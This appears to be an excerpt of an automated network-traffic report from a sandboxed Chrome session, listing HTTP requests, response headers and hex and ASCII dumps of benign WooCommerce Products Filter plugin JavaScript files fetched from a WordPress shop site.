                                                                                                          2024-12-12 11:58:37 UTC1665INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 66 65 61 74 75 72 65 64 28 29 20 7b 0a 0a 20 20 20 20 69 66 20 28 69 63 68 65 63 6b 5f 73 6b 69 6e 20 21 3d 20 27 6e 6f 6e 65 27 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 66 65 61 74 75 72 65 64 27 29 2e 69 43 68 65 63 6b 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 62 6f 78 43 6c 61 73 73 3a 20 27 69 63 68 65 63 6b 62 6f 78 5f 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 73 6b 69 6e 20 2b 20 27 2d 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 63 6f 6c 6f 72 2c 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63
                                                                                                          Data Ascii: "use strict";function woof_init_featured() { if (icheck_skin != 'none') { jQuery('.woof_checkbox_featured').iCheck({ checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color, }); jQuery('.woof_c


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          130192.168.2.2449925147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC563OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:37 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:37 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3417
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:37 UTC3417INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 72 61 64 69 6f 73 28 29 20 7b 0a 20 20 20 20 69 66 20 28 69 63 68 65 63 6b 5f 73 6b 69 6e 20 21 3d 20 27 6e 6f 6e 65 27 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 72 61 64 69 6f 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 27 64 65 73 74 72 6f 79 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 72 61 64 69 6f 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 64 69 6f 43 6c 61 73 73 3a 20 27 69 72 61 64 69 6f 5f 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 73 6b 69 6e 20 2b 20 27 2d 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 63 6f 6c 6f 72 2c
                                                                                                          Data Ascii: "use strict";function woof_init_radios() { if (icheck_skin != 'none') { jQuery('.woof_radio_term').iCheck('destroy'); jQuery('.woof_radio_term').iCheck({ radioClass: 'iradio_' + icheck_skin.skin + '-' + icheck_skin.color,


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          131192.168.2.2449926147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC750OUTGET /wp-content/plugins/woocommerce-products-filter/ext/color/js/html_types/color.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:37 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:37 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3265
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:37 UTC3265INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 63 6f 6c 6f 72 73 28 29 20 7b 0a 20 20 20 20 2f 2f 68 74 74 70 3a 2f 2f 6a 73 66 69 64 64 6c 65 2e 6e 65 74 2f 6a 74 62 6f 77 64 65 6e 2f 78 50 32 4e 73 2f 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 6f 6c 6f 72 5f 74 65 72 6d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 6f 6c 6f 72 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 63 6f 6c 6f 72 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 6d 67 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 69 6d 67 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 62 67 20 3d 20 27 27 3b 0a 20 20 20 20
                                                                                                          Data Ascii: "use strict";function woof_init_colors() { //http://jsfiddle.net/jtbowden/xP2Ns/ jQuery('.woof_color_term').each(function () { var color = jQuery(this).data('color'); var img = jQuery(this).data('img'); var bg = '';


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          132192.168.2.2449927147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:37 UTC750OUTGET /wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:37 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:37 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3545
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:37 UTC3545INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 69 6d 61 67 65 28 29 20 7b 0a 20 20 20 20 2f 2f 68 74 74 70 3a 2f 2f 6a 73 66 69 64 64 6c 65 2e 6e 65 74 2f 6a 74 62 6f 77 64 65 6e 2f 78 50 32 4e 73 2f 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 69 6d 61 67 65 5f 74 65 72 6d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 6d 61 67 65 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 69 6d 61 67 65 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 74 79 6c 65 73 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 73 74 79 6c 65 73 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 6d 61 67 65 2e 6c 65 6e 67
                                                                                                          Data Ascii: "use strict";function woof_init_image() { //http://jsfiddle.net/jtbowden/xP2Ns/ jQuery('.woof_image_term').each(function () { var image = jQuery(this).data('image'); var styles = jQuery(this).data('styles'); if (image.leng


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          133192.168.2.2449928147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:37 UTC580OUTGET /wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:38 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:37 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 39773
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:38 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 62 28 61 29 7d 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 62 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 62 28 6a 51 75 65 72 79 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 74 68 69 73 2e 24 63 6f 6e 74 61 69 6e 65 72 2c 74 68 69 73 2e 63 6f 6e 73 74 72 61 69 6e 74 73 3d 6e 75 6c 6c 2c 74 68 69
                                                                                                          Data Ascii: "use strict";!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(this,function(a){function b(a){this.$container,this.constraints=null,thi
                                                                                                          2024-12-12 11:58:38 UTC16384INData Raw: 44 75 72 61 74 69 6f 6e 5b 31 5d 29 2c 65 2e 5f 24 74 6f 6f 6c 74 69 70 2e 71 75 65 75 65 28 6d 29 29 3a 65 2e 5f 24 74 6f 6f 6c 74 69 70 2e 73 74 6f 70 28 29 2e 66 61 64 65 4f 75 74 28 65 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 61 6e 69 6d 61 74 69 6f 6e 44 75 72 61 74 69 6f 6e 5b 31 5d 2c 6d 29 7d 7d 65 6c 73 65 20 67 28 29 7d 72 65 74 75 72 6e 20 65 7d 2c 5f 6f 66 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 24 65 6d 69 74 74 65 72 50 72 69 76 61 74 65 2e 6f 66 66 2e 61 70 70 6c 79 28 74 68 69 73 2e 5f 5f 24 65 6d 69 74 74 65 72 50 72 69 76 61 74 65 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 72 67 75 6d 65 6e 74 73 29 29 2c 74 68 69 73 7d 2c 5f 6f 6e 3a 66 75 6e 63 74 69 6f 6e
                                                                                                          Data Ascii: Duration[1]),e._$tooltip.queue(m)):e._$tooltip.stop().fadeOut(e.__options.animationDuration[1],m)}}else g()}return e},_off:function(){return this.__$emitterPrivate.off.apply(this.__$emitterPrivate,Array.prototype.slice.apply(arguments)),this},_on:function
                                                                                                          2024-12-12 11:58:38 UTC7005INData Raw: 76 61 72 20 63 3d 7b 74 6f 70 3a 22 62 6f 74 74 6f 6d 22 2c 72 69 67 68 74 3a 22 6c 65 66 74 22 2c 62 6f 74 74 6f 6d 3a 22 74 6f 70 22 2c 6c 65 66 74 3a 22 72 69 67 68 74 22 7d 3b 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 3d 5b 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 2c 63 5b 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 5d 5d 2c 22 6c 65 66 74 22 3d 3d 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 5b 30 5d 7c 7c 22 72 69 67 68 74 22 3d 3d 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 5b 30 5d 3f 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 2e 70 75 73 68 28 22 74 6f 70 22 2c 22 62 6f 74 74 6f 6d 22 29 3a 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 2e 70 75 73 68 28 22 72 69 67 68 74 22 2c 22 6c 65 66 74 22 29 7d 36 3d 3d 3d 61
                                                                                                          Data Ascii: var c={top:"bottom",right:"left",bottom:"top",left:"right"};b.__options.side=[b.__options.side,c[b.__options.side]],"left"==b.__options.side[0]||"right"==b.__options.side[0]?b.__options.side.push("top","bottom"):b.__options.side.push("right","left")}6===a


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          134192.168.2.2449930147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:37 UTC552OUTGET /wp-content/plugins/woocommerce-products-filter/js/front.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:38 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:38 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 60554
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:38 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 76 61 72 20 77 6f 6f 66 5f 72 65 64 69 72 65 63 74 20 3d 20 27 27 3b 2f 2f 69 66 20 77 65 20 75 73 65 20 72 65 64 69 72 65 63 74 20 61 74 74 72 69 62 75 74 65 20 69 6e 20 73 68 6f 72 74 63 6f 64 65 20 5b 77 6f 6f 66 5d 0a 76 61 72 20 77 6f 6f 66 5f 72 65 73 65 74 5f 62 74 6e 5f 61 63 74 69 6f 6e 20 3d 20 66 61 6c 73 65 3b 0a 0a 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 74 72 79 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 77 6f 6f 66 5f 63 75 72 72 65 6e 74 5f 76 61 6c 75 65 73 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 77 6f 6f 66 5f 63 75 72 72 65 6e 74 5f 76 61 6c 75 65 73 29 3b 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 29 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 77 6f 6f
                                                                                                          Data Ascii: "use strict";var woof_redirect = '';//if we use redirect attribute in shortcode [woof]var woof_reset_btn_action = false;jQuery(function () { try { woof_current_values = JSON.parse(woof_current_values); } catch (e) { woo
                                                                                                          2024-12-12 11:58:38 UTC16384INData Raw: 69 6e 20 61 6a 61 78 20 61 6e 64 20 69 6e 20 73 65 74 74 69 6e 67 73 20 74 72 79 20 61 6a 61 78 69 66 79 20 73 68 6f 70 20 69 73 20 59 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 27 23 77 6f 6f 66 5f 72 65 73 75 6c 74 73 5f 62 79 5f 61 6a 61 78 27 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 69 6e 64 65 78 2c 20 69 74 65 6d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6e 64 65 78 20 3d 3d 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 69 74 65 6d 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 27 69 64 27
                                                                                                          Data Ascii: in ajax and in settings try ajaxify shop is Yes jQuery.each(jQuery('#woof_results_by_ajax'), function (index, item) { if (index == 0) { return; } jQuery(item).removeAttr('id'
                                                                                                          2024-12-12 11:58:38 UTC16384INData Raw: 74 68 69 73 29 2e 61 64 64 43 6c 61 73 73 28 27 77 6f 6f 66 5f 68 69 64 65 5f 61 75 74 6f 5f 66 6f 72 6d 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 77 6f 6f 66 5f 73 68 6f 77 5f 61 75 74 6f 5f 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 22 2e 77 6f 6f 66 5f 61 75 74 6f 5f 73 68 6f 77 22 29 2e 73 68 6f 77 28 29 2e 61 6e 69 6d 61 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 28 6a 51 75 65 72 79 28 22 2e 77 6f 6f 66 5f 61 75 74 6f 5f 73 68 6f 77 5f 69 6e 64 65 6e 74 22 29 2e 68 65 69 67 68 74 28 29 20 2b 20 32 30 29 20 2b 20 22 70 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a
                                                                                                          Data Ascii: this).addClass('woof_hide_auto_form').removeClass('woof_show_auto_form'); jQuery(".woof_auto_show").show().animate( { height: (jQuery(".woof_auto_show_indent").height() + 20) + "px", opacity:
                                                                                                          2024-12-12 11:58:38 UTC11402INData Raw: 7d 0a 0a 2f 2f 66 6f 72 20 22 53 68 6f 77 20 6d 6f 72 65 22 20 62 6c 6f 63 6b 73 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 28 29 20 7b 0a 20 20 20 20 69 66 20 28 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 5f 62 74 6e 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 5f 62 74 6e 27 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 62 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6a 51 75 65 72 79 28 62 29 2e 70 61 72 65 6e 74 73 28 27 75 6c 27 29 2e 66 69 6e 64 28 27 6c 69 2e 77 6f 6f 66 5f 68 69 64 64 65 6e 5f 74 65
                                                                                                          Data Ascii: }//for "Show more" blocksfunction woof_open_hidden_li() { if (jQuery('.woof_open_hidden_li_btn').length > 0) { jQuery.each(jQuery('.woof_open_hidden_li_btn'), function (i, b) { if (jQuery(b).parents('ul').find('li.woof_hidden_te


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          135192.168.2.2449929147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:37 UTC750OUTGET /wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:38 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:38 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1823
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:38 UTC1823INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 6c 61 62 65 6c 73 28 29 20 7b 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 68 65 63 6b 62 6f 78 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 27 29 2e 65 71 28 30 29 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 6a 51 75 65 72 79 28 63 68 65 63 6b 62 6f 78 29 2e 69 73 28 27 3a 63 68 65 63 6b 65 64 27 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 63 68 65 63 6b 62 6f 78 29 2e 61 74 74
                                                                                                          Data Ascii: "use strict";function woof_init_labels() { jQuery('.woof_label_term').on('click', function () { var checkbox = jQuery(this).find('input.woof_label_term').eq(0); if (jQuery(checkbox).is(':checked')) { jQuery(checkbox).att


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          136192.168.2.2449934147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC752OUTGET /wp-content/plugins/woocommerce-products-filter/ext/slider/js/html_types/slider.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:38 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:38 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2935
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
